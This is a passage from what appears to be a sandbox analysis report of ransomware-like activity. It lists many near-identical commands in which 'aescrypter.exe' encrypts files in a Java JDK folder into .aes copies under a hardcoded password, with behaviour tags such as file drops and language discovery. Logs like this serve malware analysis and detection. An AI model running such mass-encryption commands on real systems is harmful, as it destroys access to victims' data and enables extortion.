  2⤵
  PID:2404
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2100
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-cli.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1772
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2236
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1892
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:980
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2436
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1636
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1908
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:744
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:344
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2380
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2196
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:604
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1688
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2080
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1708
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2124
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1936
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2316
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1904
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1916
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2960
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2740
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2616
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2200
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2892
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2328
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3024
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:380
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:560
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-explorer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2948
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2284
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2784
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2916
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1500
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1612
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2996
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2156
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1664
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1740
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2084
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-windows.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3032
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2288
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2988
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2088
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2060
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1608
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1372
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2208
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2256
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1528
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1908
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1976
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2576
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2452
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2508
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2492
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:976
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2136
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2532
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1596
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1924
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2868
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2884
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2712
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1900
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2852
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-utilities.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2896
- C:\ProgramData\local\aescrypter.exe
